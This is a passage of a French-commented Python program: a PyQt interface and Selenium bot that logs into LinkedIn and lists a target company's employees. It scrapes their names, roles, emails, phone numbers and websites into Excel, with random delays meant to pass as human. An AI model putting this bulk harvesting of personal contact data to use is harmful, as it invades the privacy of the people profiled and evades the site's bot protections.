QtWidgets.QLabel('...', self)\n grid.addWidget(self.statut_recherche, 0, 0)\n\n # Bouton pause\n self.btn_pause = QtWidgets.QPushButton('', self)\n self.btn_pause.setIcon(QtGui.QIcon('pausebutton.png'))\n self.btn_pause.setIconSize(QtCore.QSize(45, 45))\n self.btn_pause.resize(self.btn_pause.sizeHint())\n self.btn_pause.setCheckable(True)\n # self.btn_pause.clicked[bool].connect(self.setpause)\n grid.addWidget(self.btn_pause, 2, 2)\n\n # Numéro de la page\n self.page_count = 1\n self.statut_page = QtWidgets.QLabel('Page ' + str(self.page_count), self)\n grid.addWidget(self.statut_page, 1, 0)\n\n # Barre de progression\n self.pbar = QtWidgets.QProgressBar(self)\n self.pbar.setValue(0)\n self.pbar.setMaximum(10)\n self.pbar.setObjectName(\"progressBar\")\n grid.addWidget(self.pbar, 2, 0, 2, 1)\n\n self.show()\n\n def set_max(self, val: int):\n \"\"\"\n Met à jour la valeur max de la barre de progression\n :param val:\n \"\"\"\n self.pbar.setMaximum(val)\n\n def addstep(self):\n \"\"\"\n Incrémente de 1 la barre de progression\n \"\"\"\n if self.pbar.value() < self.pbar.maximum():\n self.pbar.setValue(self.pbar.value() + 1)\n else:\n self.pbar.setValue(0)\n\n def addpage(self):\n \"\"\"\n Incrémente de 1 le statut de la page\n \"\"\"\n self.page_count += 1\n self.statut_page.setText('Page ' + str(self.page_count))\n\n def update_statut_recherche(self, text: str):\n \"\"\"\n Met à jour le text du label statut_recherche\n :param text:\n \"\"\"\n self.statut_recherche.setText(text)\n\n def update_statut_page(self, text: str):\n \"\"\"\n Met à jour le text du label statut_page\n :param text:\n \"\"\"\n self.statut_page.setText(text)\n\n\n##################### Classe Interface Tableau Tps réel ############################\nclass TableTpsReel(QtWidgets.QWidget):\n \"\"\"\n Definit une fenetre avec un tableau qui reproduit ce qui est ajouté au fichier\n excel\n \"\"\"\n update_statut_recherche = pyqtSignal(str)\n\n def __init__(self, chemin: str):\n super().__init__()\n width = 1300\n height = 790\n self.setGeometry(455, 38, width, height)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setWindowTitle(\"Résultat\")\n\n self.gridLayout = QtWidgets.QGridLayout(self)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n\n self.tableWidget = QtWidgets.QTableWidget(self)\n self.tableWidget.setObjectName(\"tableWidget\")\n sh = load_workbook(chemin) # Ouvre le fichier\n sh = sh[sh.sheetnames[0]] # Accède à la première feuille\n self.tableWidget.setColumnCount(sh.max_column)\n self.tableWidget.setRowCount(0)\n\n self.remplissage_table_init(sh)\n self.gridLayout.addWidget(self.tableWidget, 0, 0, 1, 1)\n self.show()\n\n def remplissage_table_init(self, sh):\n \"\"\"\n Recopie les valeurs du fichier excel dans le tablewidget\n :param sh:\n \"\"\"\n # Teste s'il y a des noms de colonnesd première ligne\n if len(sh.cell(row=1, column=1).value) > 0 or len(sh.cell(row=1, column=2).value) > 0:\n for colnum in range(1, sh.max_column + 1):\n # Inscrit les valeurs de la première ligne comme nom de colonne dans le table widget\n item = QtWidgets.QTableWidgetItem(sh.cell(row=1, column=colnum).value)\n self.tableWidget.setHorizontalHeaderItem(colnum - 1, item)\n # Si le fichier excel a déjà des données (à partir de la deuxième ligne)\n if sh.max_row > 1:\n for rownum in range(2, sh.max_row + 1):\n self.tableWidget.insertRow(self.tableWidget.rowCount()) # Ajoute une ligne au tableWidget\n for colnum in range(1, sh.max_column):\n # Remplit le table Widget à partir du fichier excel\n item = QtWidgets.QTableWidgetItem(sh.cell(row=rownum, column=colnum).value)\n self.tableWidget.setItem(self.tableWidget.rowCount() - 1, colnum - 1, item)\n # Fait défiler le tableau jusqu'à la dernière ligne\n self.tableWidget.scrollToBottom()\n\n # colidx apparie les mot clé des noms de colonne et son numéro dans le tableau.\n self.colidx = dict()\n # colname détermine les mots clés des nom de colonne qui seront recherchés dans le fichier excel\n self.colname = ['société', 'domain', 'nom', 'profil', 'fonction', 'tel', 'mail', 'localisation', 'site']\n # loop through headers and find column number for given column name\n headercount = self.tableWidget.columnCount()\n for x in range(0, headercount, 1):\n headertext = self.tableWidget.horizontalHeaderItem(x).text()\n self.colidx.update({columnname: x for columnname in self.colname if\n self.supprime_accent(columnname).upper() in self.supprime_accent(\n headertext).upper()})\n else:\n raise ValueError # Si pas de noms de colonne dans la première ligne retourne une erreur\n\n def remplissage_table(self, info: dict):\n \"\"\"\n Remplit le table Widget avec les informations contenues dans le dictionnaires retourné par Bot\n :param info:\n \"\"\"\n try:\n self.tableWidget.insertRow(self.tableWidget.rowCount()) # insert une nouvelle ligne à la fin du tableau\n for col in self.colidx.keys():\n if col in info.keys(): # si le mot clé dans le nom de colonne correspond à une des clé du dict info\n # on ajoute l'info correspondante à la bonne place dans la bonne colonne\n item = QtWidgets.QTableWidgetItem(info[col])\n self.tableWidget.setItem(self.tableWidget.rowCount() - 1, self.colidx[col], item)\n self.tableWidget.scrollToBottom() # pour que la dernière ligne reste toujours visible\n except:\n self.update_statut_recherche.emit('Problème dans l\"écriture des infos dans le tableau')\n\n def supprime_accent(self, ligne: str):\n \"\"\" supprime les accents du texte source \"\"\"\n accents = {'a': ['à', 'ã', 'á', 'â'],\n 'e': ['é', 'è', 'ê', 'ë'],\n 'i': ['î', 'ï'],\n 'u': ['ù', 'ü', 'û'],\n 'o': ['ô', 'ö'],\n ' ': ['-', '_']}\n for (char, accented_chars) in accents.items():\n for accented_char in accented_chars:\n ligne = ligne.replace(accented_char, char)\n return ligne\n\n\n##############################Bot class ###########################################\n####################################################################################\n\nclass Communicate(QObject):\n \"\"\"\n Classe de signaux permettant de mettre à jour les barre de progression et tableau\n \"\"\"\n update_statut_recherche = pyqtSignal(str)\n update_statut_page = pyqtSignal(str)\n update_pbar = pyqtSignal()\n update_table = pyqtSignal(dict)\n add_page = pyqtSignal()\n get_max = pyqtSignal(int)\n\n\nclass Bot(QThread):\n \"\"\"\n Classe Bot qui lance le bot et lance la recherche sur linkedin pour scanner les profil résultant de la recherche\n paramètres : identifiant, mdp, societe, region, into_profil, recherche_contrainte, chemin, keywords, antikeywords, navigateur\n \"\"\"\n\n def __init__(self, identifiant, mdp, societe, region, into_profil, recherche_type, chemin, keywords, antikeywords,\n navigateur):\n super().__init__()\n # Infos rentrées dans l'IHM\n self.inputUser = dict()\n self.inputUser['USER'] = identifiant\n self.inputUser['PASSWORD'] = mdp\n self.inputUser['REGION'] = region\n self.inputUser['ENTREPRISE'] = societe\n self.inputUser['intoProfile'] = into_profil\n self.inputUser['recherche_type'] = recherche_type\n self.keywords = keywords\n self.antikeywords = antikeywords\n self.chemin = chemin\n self.nav = navigateur\n self.c = Communicate()\n self.continueflag = True\n self.pauseflag = False\n self.domain=''\n self.targetedInfo = ['nom', 'fonction', 'société', 'profil', 'localisation', 'tel', 'mail', 'site', 'domain',\n 'auparavant']\n # Ouvre un navigateur en tâche de fond selon le choix de l'utilisateur\n # Ajoute le driver du navigateur dans la variable d'environnement PATH si elle n'y est pas\n if self.nav == 'Firefox':\n if os.path.join(os.getcwd(), 'geckodriver') not in os.environ['PATH']:\n os.environ['PATH'] = os.environ['PATH'] + ';' + os.path.join(os.getcwd(), 'geckodriver')\n options = webdriver.FirefoxOptions()\n options.set_headless(headless=True)\n self.browser = webdriver.Firefox(options=options)\n self.browser.implicitly_wait(1)\n\n elif self.nav == 'Chrome':\n if os.path.join(os.getcwd(), 'chromedriver') not in os.environ['PATH']:\n os.environ['PATH'] = os.environ['PATH'] + ';' + os.path.join(os.getcwd(), 'chromedriver')\n options = webdriver.ChromeOptions()\n options.set_headless(headless=True)\n self.browser = webdriver.Chrome(options=options)\n self.browser.implicitly_wait(1)\n\n def run(self):\n while True:\n # Méthode lancé quand on commence le thread\n login = self.login_linkedin() # Lance une tentative de login sur la page de linkedin\n if login is True:\n self.c.update_statut_recherche.emit(\"Identification réussie\")\n\n # Point de contrôle pour stopper la recherche si l'utilisateur a appuyé sur STOP\n if self.continueflag is False:\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n break\n nom_entreprise = 'OK'\n # Fixe la variable à OK par défaut, nom_entreprise est actualisée si le champ entreprise est rempli\n if len(self.inputUser['ENTREPRISE']) > 0:\n # Lance une recherche sur l'entreprise pour en extraire le domaine\n try:\n self.browser.get(self.create_url_to_search(self.inputUser['ENTREPRISE'], typeSearch='companies'))\n except:\n self.c.update_statut_recherche.emit('Erreur lors du chargement de la page')\n break\n\n if self.continueflag is False:\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n break\n\n self.waiting_for('search/results/') # Attend que la page se charge et que l'url est changé\n self.domain, nom_entreprise = self.get_company_domain() # Extrait le domaine de l'entreprise\n\n if nom_entreprise == 'OK':\n # Lance une recherche sur les employés de cette entreprise\n try:\n self.browser.get(\n self.create_url_to_search(self.inputUser['ENTREPRISE'], self.inputUser['REGION'],\n typeSearch='people'))\n # self.waiting_for('search/results/')\n wait = self.wait_for_full_loading()\n # print(self.browser.current_url)\n\n self.filtre_entreprise_actuelle()\n\n # Lance le bot\n self.view_bot() # Lance la récupération des infos de la recherche\n break # puis sort de la boucle pour fermer correctement le thread\n\n except Exception as exception:\n # Si une erreur est détectée,\n # renvoie la ligne et le type d'erreur dans le code puis sort proprement de l'appli\n # Facilite le débogage sans faire planter l'appli et sans laisser le thread ouvert\n self.c.update_statut_recherche.emit(\n \"line {} {} {}\".format(exception.__traceback__.tb_lineno,\n type(exception).__name__,\n exception.with_traceback(exception.__traceback__)))\n self.sleep(5) # Laisse le temps à l'utilisateur de lire le message d'erreur\n break\n else:\n self.c.update_statut_recherche.emit('Aucune correspondance avec l\"entreprise recherchée')\n break\n else:\n break\n self.browser.quit() # Ferme le navigateur\n\n def login_linkedin(self):\n \"\"\"\n Login sur linkedin\n :return:\n \"\"\"\n try:\n self.browser.get('https://www.linkedin.com/uas/login')\n except WebDriverException:\n self.c.update_statut_recherche.emit(\n 'Impossible d\"atteindre la page d\"identification, Vérifier la connexion')\n return False\n\n self.waiting_for2('https://www.linkedin.com/uas/login')\n if self.browser.current_url == 'https://www.linkedin.com/uas/login':\n emailElement = self.browser.find_element_by_id(\"session_key-login\")\n emailElement.send_keys(self.inputUser['USER'])\n passElement = self.browser.find_element_by_id('session_password-login')\n passElement.send_keys(self.inputUser['PASSWORD'])\n passElement.submit()\n # Waiting for the home page to load with timeout\n self.c.update_statut_recherche.emit('Identification...')\n self.waiting_for2(\"https://www.linkedin.com/feed/?trk=\")\n if self.browser.current_url == \"https://www.linkedin.com/feed/?trk=\":\n return True\n else:\n self.c.update_statut_recherche.emit(\n 'L\"identification a échouée, vérifier les identifiants et mots de passe')\n return False\n else:\n self.c.update_statut_recherche.emit(\n 'La durée de connexion à la page est anormalement longue, vérifiez votre connexion')\n return False\n\n def create_url_to_search(self, *keywords, typeSearch: str):\n \"\"\"\n Create the url of the research based on the user input\n :param keywords:\n :param typeSearch:\n :rtype str:\n \"\"\"\n basic_url_start = 'https://www.linkedin.com/search/results/' + typeSearch + '/?keywords='\n basic_url_end = '&origin=GLOBAL_SEARCH_HEADER'\n # if typeSearch == \"people\":\n # basic_url_end = basic_url_end + '&page=34'\n for keyword in keywords:\n basic_url_start = basic_url_start + '%20' + keyword.replace(' ', '%20')\n self.c.update_statut_recherche.emit(\"[+] Searching for : {}\".format(keywords))\n return basic_url_start + basic_url_end\n\n def get_company_domain(self):\n \"\"\"\n Extrait les informations de domaine de l'entreprise recherchée\n :return:\n \"\"\"\n page = BeautifulSoup(self.browser.page_source, \"html.parser\")\n nom_entreprise = 'Aucune correspondance'\n domain = \"\"\n for link in page.find_all('div', class_='search-result__info pt3 pb4 pr0'):\n try:\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n link.select('a > h3')[0].text.strip()).upper():\n nom_entreprise = 'OK'\n domain = link.select('p.subline-level-1.Sans-15px-black-85%.search-result__truncate')[\n 0].text.strip()\n # print(domain)\n if domain is not False:\n break\n except:\n break\n return domain, nom_entreprise\n\n def filtre_entreprise_actuelle(self):\n \"\"\"\n Clique sur le bouton Tous les filtres de la page de recherche et sélectionne les champs utiles selon\n le choix d'option de l'utilisateur 'Actuel, Auparavant, Actuel+Auparavant'\n et Active le filtre sur la localisation quand c'est possible\n :return:\n \"\"\"\n try:\n self.browser.execute_script(\"window.scrollTo(0, 0);\") # s'assure qu'on est bien en haut de la page\n # Clique sur le bouton des filtres avancés\n self.browser.find_element_by_xpath(\n \"//button[@class='search-filters-bar__all-filters button-tertiary-medium-muted mr3']\").click()\n # Récupère le conteneur où sont les optiops de filtres\n form = self.browser.find_element_by_xpath(\"//div[@class='search-advanced-facets__layout display-flex ph0']\")\n # Récupère le conteneur de l'entête où sont les boutons pour appliquer les filtres\n form_header = self.browser.find_element_by_xpath(\n \"//div[@class='search-advanced-facets__layout display-flex align-items-center justify-space-between']\")\n\n # Si l'utilsateur a choisi le mode Actuel+Auparavant, on ne fait rien c'est la recherche normale\n if len(self.inputUser['ENTREPRISE']) > 0: #Si le champ Entreprise est rempli\n if self.inputUser['recherche_type'] == 'Actuel': # Si l'utilisateur à choisi le mode Actuel\n # Localise le conteneur des options du filtre Entreprise Actuelle\n zoneactuel = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetCurrentCompany']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zoneactuel)\n # récupère la division blocante pour sélectionner les entreprises\n block = zoneactuel.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\")\n\n # Récupère les propositions de Linkedin\n listentreprise = zoneactuel.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n for entreprise in listentreprise:\n entrepriseid = entreprise.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(entrepriseid.text)\n\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entrepriseid.text).upper():\n # Récupère l'élément cliquable\n entreprise.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Clique sur la checkbox de l'entreprise en passant au delà de la division blocante\n webdriver.ActionChains(self.browser).move_to_element(block).click(entreprise).perform()\n break\n\n if self.inputUser['recherche_type'] == 'Auparavant': # Si l'utilisateur a choisi le mode auparavant\n zoneauparavant = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetPastCompany']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zoneauparavant)\n # self.sleep(2)\n block = zoneauparavant.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\") # récupère la division blocante pour sélectionner les entreprises\n listentreprise = zoneauparavant.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n for entreprise in listentreprise:\n entrepriseid = entreprise.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(entrepriseid.text)\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entrepriseid.text).upper():\n # Récupère l'élément cliquable\n entreprise.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Clique sur la checkbox de l'entreprise en passant au delà de la division blocante\n webdriver.ActionChains(self.browser).move_to_element(block).click(entreprise).perform()\n self.sleep(1)\n break\n\n try:\n # Récupère dans l'input de localisation et récherche :région de ville et en extrait la ville\n # préserve la possibilité d'utiliser d'autres termes de recherches dans la partie localisation\n # de l'interface\n region = re.search(\"REGION DE \" + r\"[\\w]+\", self.supprime_accent(self.inputUser['REGION']).upper())\n if region:\n ville = region.group().replace('REGION DE ', \"\")\n\n # Applique le filtre sur la zone géographique si proposé par linkedin\n zonelieu = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetGeoRegion']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zonelieu)\n # self.sleep(2)\n\n # récupère la division blocante pour sélectionner les entreprises\n block = zonelieu.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\")\n listlieu = zonelieu.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n\n for lieu in listlieu:\n lieuid = lieu.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(entrepriseid.text)\n\n if ville in self.supprime_accent(\n lieuid.text).upper():\n # Récupère l'élément cliquable\n lieu.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Clique sur la checkbox de l'entreprise en passant au delà de la division blocante\n webdriver.ActionChains(self.browser).move_to_element(block).click(lieu).perform()\n break\n\n except exceptions.NoSuchElementException: # Si la partie filtre n'est pas accessible\n self.c.update_statut_recherche.emit(\n \"Le filtre région n'est pas disponible\")\n self.sleep(5) # laisse le temps à l'utilisateur de lire le message d'erreur\n\n # clique sur le bouton pour appliquer les filtres\n form_header.find_element_by_xpath(\n \".//button[@class='search-advanced-facets__button--apply button-primary-large']\").click()\n self.sleep(5) # laisse le temps à l'utilisateur de lire le message d'erreur\n self.wait_for_full_loading()\n except:\n self.c.update_statut_recherche.emit(\n 'Problème dans la sélection des filtres, Actuel + Auparavant par défaut')\n self.inputUser['recherche_type'] = 'Actuel+Auparavant'\n self.sleep(5) # laisse le temps à l'utilisateur de lire le message d'erreur\n\n def view_bot(self):\n \"\"\"\n Coeur du Bot qui appelle les autres fonctions\n :return:\n \"\"\"\n visited = self.get_visited()\n count = 0 # Comptabilise le nombre de profil acceptés\n pidx = 1 # Compteur de page\n page = BeautifulSoup(self.browser.page_source, \"html.parser\")\n\n while self.continueflag: # Boucle jusqu'à la dernière page de la\n\n # sauve l'url de la page de recherche pour y retourner si on rentre dans les profils\n search_page = self.browser.current_url\n\n self.pause() # vérifie le pauseflag et met en pause si == True\n\n people, job, loc, statut = self.get_people_links(page, visited)\n # récupère les liens des personnes correspondants aux keywords et n'étant pas déjà dans le fichier excel\n\n if people:\n self.c.get_max.emit(len(people))\n for nom, person in people.items(): # Pour chaque profil correspondant au critères\n # print(nom)\n # print(statut[nom])\n # print(job[nom])\n self.pause() # vérifie le pauseflag et met en pause si == True\n\n if self.continueflag is False: # Si bouton STOP préssé pendant la boucle, sors de la boucle\n break\n\n info = dict() # initialise le dictionnaire qui va receuillir les infos du profil en cours\n\n time.sleep(random.uniform(3.5, 6.9)) # add random to make us look human\n\n ID = self.get_id(people[nom]) # construit l'URL complète du profil\n\n count += 1\n\n # Récupère les infos présentes dans la page de recherche\n info = self.get_list_info(nom, job, ID, loc, statut[nom])\n # Mets à jour le statut de recherche dans la barre de progression\n self.c.update_statut_recherche.emit(\n \"[+]\" + nom + \" checked \\n (\" + str(count) + \") Checked\")\n\n if self.inputUser['intoProfile'] is True or info['statut'] == 'Indéterminé':\n\n self.browser.get(ID) # va sur le profil\n\n self.waiting_for2(\"/in/\") # Attend le chargement de la page\n\n if \"/in/\" in self.browser.current_url:\n info = self.get_profile_infos(info) # Récupère les infos sur le profil des person\n\n # Mets à jour le statut de recherche dans la barre de progression\n self.c.update_statut_recherche.emit(\"Profil visited!\")\n else:\n # si le lien du profil ne renvoie à rien (page \"Utilisateur Linkedin non accessible\")\n # on passe au lien suivant\n continue\n\n self.c.update_pbar.emit() # met à jour la barre de progression\n # N'inscrit dans la tableau que si c'est un poste actuel\n if info['statut'] == 'Actuel':\n # Remplit le champ domaine uniquement quand c'est l'entreprise actuelle\n info['domain'] = self.domain\n self.c.update_table.emit(info) # Remplit le tableau\n\n self.transfer_excel(info) # Transfert les données récoltée sur excel\n visited.add(nom) # Ajoute le nouveau nom à la liste des profils visités\n\n else: # S'il n'ya personne de retenu dans la page de recherche\n self.c.update_statut_recherche.emit('Aucune correspondance')\n\n if self.browser.current_url != search_page:\n self.browser.get(search_page) # retourne à la page des recherche\n\n wait = self.wait_for_full_loading() # Attend le chargement de la page\n if wait == 1:\n raise exceptions.TimeoutException('Temps de chargement de la page anormalement long')\n\n self.pause() # vérifie le pauseflag et met en pause si == True\n\n try:\n self.browser.find_element_by_xpath(\"//button[@class='next']\").click() # Clique sur le bouton next\n pidx += 1\n self.waiting_for(\"&page=\" + str(pidx)) # Attend le chargement de la page\n wait = self.wait_for_full_loading() # Attend le chargement de la page\n if wait == 1:\n raise exceptions.TimeoutException('Temps de chargement de la page anormalement long')\n\n # print(self.browser.current_url)\n if self.browser.current_url == search_page: # Si l'url n'a pas changé après next, sort de la boucle\n self.c.update_statut_page.emit('Passement de page défaillant')\n break # Pour que le message soit le dernier vu par l'utilisateur et non pas les message de except\n\n page = BeautifulSoup(self.browser.page_source, \"html.parser\") # analyse le code de la nouvelle page\n self.c.add_page.emit() # Mets à jour le statut page de la barre de progression\n\n except: # Si on échoue à toruver le bouton next\n self.c.update_statut_page.emit('Dernière page atteinte')\n self.c.update_statut_recherche.emit('Plus personne à voir')\n self.sleep(5)\n break\n\n if self.continueflag is False: # Si la recherche a été stoppé par l'utilisateur\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n\n return\n\n def get_visited(self):\n \"\"\"\n Lit le fichier Excel, récupère les noms déjà inclus dans la liste des noms\n :return: visited\n \"\"\"\n visited = set()\n sh = load_workbook(self.chemin)\n # Cherche dans la première feuille les profils visités\n sh = sh[sh.sheetnames[0]]\n colname = self.get_excel_columnid(sh)\n for rownum in range(1, sh.max_row + 1):\n visited.add(str(sh.cell(row=rownum, column=colname['nom']).value))\n ## Cherche dans la 2ème feuille les\n # sh = sh[sh.sheetnames[1]]\n # colname = self.get_excel_columnid(sh)\n # for rownum in range(1, sh.max_row + 1):\n # visited.add(str(sh.cell(row=rownum, column=colname['nom']).value))\n return visited\n\n def get_id(self, url: str):\n \"\"\"\n Constuit l'url complète du profil linkedin\n :param url:\n :return:\n \"\"\"\n root = 'http://www.linkedin.com'\n return root + url\n\n def get_people_links(self, page, visited):\n \"\"\"\n Récupère les liens dans la page de recherche selon la concordance du poste actuel avec les keywords et les antikeywords\n :rtype dict:\n \"\"\"\n links = dict()\n job = dict()\n loc = dict()\n statut = dict()\n\n for link in page.find_all('div', class_='search-result__info pt3 pb4 ph0'):\n lien = link.find('a')\n url = lien.get('href')\n # print(url)\n poste1 = \"\" # poste Actuel si disponible\n poste2 = \"\" # poste description\n lieu = \"\" # localisation du client\n if url:\n if '/in/' in url and url not in links.values():\n nom = link.find('span', class_='name actor-name').text\n # Cherche le poste actuel\n try:\n poste1 = link.find('p',\n class_='search-result__snippets mt2 Sans-13px-black-55% ember-view').text\n if 'Actuel :' in poste1:\n poste1 = poste1.replace('Actuel :', '').strip()\n else:\n poste1 = \"\"\n\n except:\n pass\n # Si le poste actuel n'est pas disponible, cherche dans le titre du client\n try:\n poste2 = link.select('p.subline-level-1.Sans-15px-black-85%.search-result__truncate')[\n 0].text.strip()\n except:\n pass\n # Cherche le lieu de travail, Pour vérifier que cela correspond bien à la localisation recherchée\n try:\n lieu = link.select('p.subline-level-2.Sans-13px-black-55%.search-result__truncate')[\n 0].text.strip()\n except:\n pass\n\n poste = poste1 + ' ' + poste2 # On concatène les deux lignes pour être sur d'avoir le maximum de motsclés\n alerte_anti_key = 0 # initialise la variable\n for antikeyword in self.antikeywords:\n if poste:\n if self.supprime_accent(\n antikeyword).upper() in self.supprime_accent(poste).upper():\n # Dès qu'au moins un des anti keyword est détecté on flag et on sort de la boucle\n alerte_anti_key = 1\n break\n # print(nom)\n # print(poste)\n for keyword in self.keywords:\n if poste:\n if self.supprime_accent(keyword).upper() in self.supprime_accent(poste).upper() \\\n and alerte_anti_key == 0 and nom not in visited:\n # filtre sur les postes et les noms déjà présents dans le fichier excel\n if keyword == 'CTO' and 'DIRECTOR' in self.supprime_accent(poste).upper():\n continue # lève une ambiguité\n\n links[nom] = url\n if 'CHEZ ' in self.supprime_accent(\n poste1).upper() or ' AT ' in self.supprime_accent(poste1).upper():\n job[nom] = poste1 # ligne Poste \"Actuel\"\n else:\n job[nom] = poste2 # ligne Titre\n\n loc[nom] = lieu\n\n if self.supprime_accent(\n self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(poste).upper():\n # Si le nom de l'entreprise est dans les intitulé de poste > Poste actuel\n statut[nom] = 'Actuel'\n else:\n if 'CHEZ ' in self.supprime_accent(\n poste).upper() or ' AT ' in self.supprime_accent(poste).upper():\n # Si on trouve Chez ou At -> il y a mention d'une entreprise -> Nouveau poste\n statut[nom] = 'Nouveau'\n else: # Si pas de mention de l'entreprise dans les intitulé de poste\n statut[nom] = 'Indéterminé'\n # print(nom)\n # print(job[nom])\n\n break\n\n self.c.update_statut_recherche.emit('Récupération de ' + str(len(links)) + ' liens OK')\n return links, job, loc, statut\n\n def get_list_info(self, nom: str, job: dict, ID: str, loc: dict, statut: str):\n \"\"\"\n Extrait les infos directement depuis la page de recherche\n :param nom:\n :param job:\n :param ID:\n :param loc:\n :return:\n \"\"\"\n info = {target: \"\" for target in self.targetedInfo} # initialise les valeurs du dictionnaire\n info['nom'] = nom\n info['fonction'] = job[nom]\n info['localisation'] = loc[nom]\n try:\n boite = job[nom][job[nom].upper().index('CHEZ') + 5:]\n except ValueError:\n try:\n boite = job[nom][job[nom].upper().index(' AT ') + 3:]\n except ValueError:\n boite = self.inputUser['ENTREPRISE'] + ' (défaut)'\n info['société'] = boite\n info['profil'] = ID\n info['statut'] = statut\n return info\n\n def profile_infos_button(self):\n \"\"\"\n Essaie de trouver le bouton dépliant permettant d'acceder aux infos personnelles des profils\n :return:\n \"\"\"\n try:\n # Recherche le bouton sur un profile non connecté à l'utilisateur\n button = self.browser.find_element_by_css_selector('.pv-top-card-v2-section__contact-info')\n button.click()\n time.sleep(2) # Laisse le temps de charger\n return True\n except:\n self.c.update_statut_recherche.emit(\"Pas trouvé le bouton\")\n time.sleep(3)\n return False\n\n def get_info_links(self, profilePage, info: dict):\n \"\"\"\n Récupère les infos personnelles dans le profil et les stocke dans un dict\n :param profilePage:\n :param info:\n :return info:\n \"\"\"\n\n # contact = profilePage.select(\"div.pv-profile-section__section-info.section-info\")\n try:\n i = profilePage.select(\"section.pv-contact-info__contact-type.ci-vanity-url > \"\n \"div.pv-contact-info__ci-container > \"\n \"a\")[0]\n info['profil'] = i.get('href')\n # print(info['profil'])\n except:\n pass\n\n try:\n i = profilePage.select(\"section.pv-contact-info__contact-type.ci-email > \"\n \"div.pv-contact-info__ci-container > \"\n \"a\")[0]\n info['mail'] = i.get('href')\n except:\n pass\n\n try:\n i = profilePage.select('section.pv-contact-info__contact-type.ci-websites > '\n 'ul.list-style-none > '\n 'li.pv-contact-info__ci-container > div > a')[0]\n info['site'] = i.get('href')\n # print(info['site'])\n except:\n pass\n return info\n\n def get_profile_infos(self, info: dict):\n \"\"\"\n Récupère les infos disponibles sur la page de profil linkedin et les sauvent dans le dict infos\n Si statut est == indéterminé on recherche dans la partie expérience pour voir le dernier poste et vérifie si\n l'entreprise correspond à l'entreprise recherchée,\n ajoute une nouvelle entrée statut au dictionnaire info pour déterminer si Actuel ou Nouveau\n Si l'option Coordonnées est cochée, on récupère les coordonnées disponibles (dépend de la connexion avec l'utilisateur\n :param info:\n :param statut\n :return:\n \"\"\"\n # Fais défiler toute la page pour que tous les élements du profil se chargent et soient accessible dans le code\n # source de la page\n for x in range(0, 5000, 5):\n self.browser.execute_script(\"window.scrollTo(0, {});\".format(x))\n\n profilePage = BeautifulSoup(self.browser.page_source, \"html.parser\")\n\n try:\n info['localisation'] = \\\n profilePage.select(\"h3.pv-top-card-section__location.Sans-17px-black-55%-dense.mt1.inline-block\")[\n 0].text.strip()\n except:\n info['localisation'] = ''\n\n if info['statut'] == 'Indéterminé':\n xpcount = 0\n for experience in profilePage.find_all('li',\n class_='pv-profile-section__card-item pv-position-entity ember-view'):\n # print(experience)\n xpcount += 1\n entreprise = experience.select('h4.Sans-17px-black-85% > span.pv-entity__secondary-title')[\n 0].text.strip()\n\n if xpcount == 1: # Si c'est le dernier poste en date et donc la première entrée de la section\n info['société'] = entreprise\n info['fonction'] = experience.select('h3.Sans-17px-black-85%-semibold')[0].text.strip()\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entreprise).upper():\n info['statut'] = 'Actuel'\n break # Si c'est le poste actuel, pas besoin de chercher plus loin, on sort de la boucle\n else:\n info['statut'] = 'Nouveau'\n\n else: # Cherche le poste que le client occupait quand il travaillait dans l'entreprise recherchée\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entreprise).upper():\n info['auparavant'] = experience.select('h3.Sans-17px-black-85%-semibold')[0].text.strip() \\\n + ' chez ' + entreprise\n\n if self.inputUser['intoProfile']:\n button = self.profile_infos_button()\n # Déroule le menu où on peut trouver les infos de contacts\n if button:\n info = self.get_info_links(profilePage, info)\n try:\n info['tel'] = profilePage.select(\n \"section.pv-contact-info__contact-type.ci-phone > ul.list-style-none > \"\n \"li.pv-contact-info__ci-container > span.Sans-15px-black-85%\")[\n 0].text.strip()\n # print(info['tel'])\n except:\n info['tel'] = 'indisponible'\n else:\n info['profil'] = self.browser.current_url\n\n return info\n\n def transfer_excel(self, infos: dict):\n \"\"\"\n Récupère les infos des profils Linkedin et les écrits dans le fichier Excel choisis par l'utilisateur\n :param infos:\n :return:\n \"\"\"\n try:\n book = load_workbook(self.chemin)\n if infos['statut'] == 'Actuel':\n # Si le client est actuellement dans l'entreprise\n sheet = book[book.sheetnames[0]] # On écrit sur la première feuille du fichier excel\n elif infos['statut'] == 'Nouveau':\n # Si le client n'est plus dans l'entreprise mais y a travaillé auparavant\n sheet = 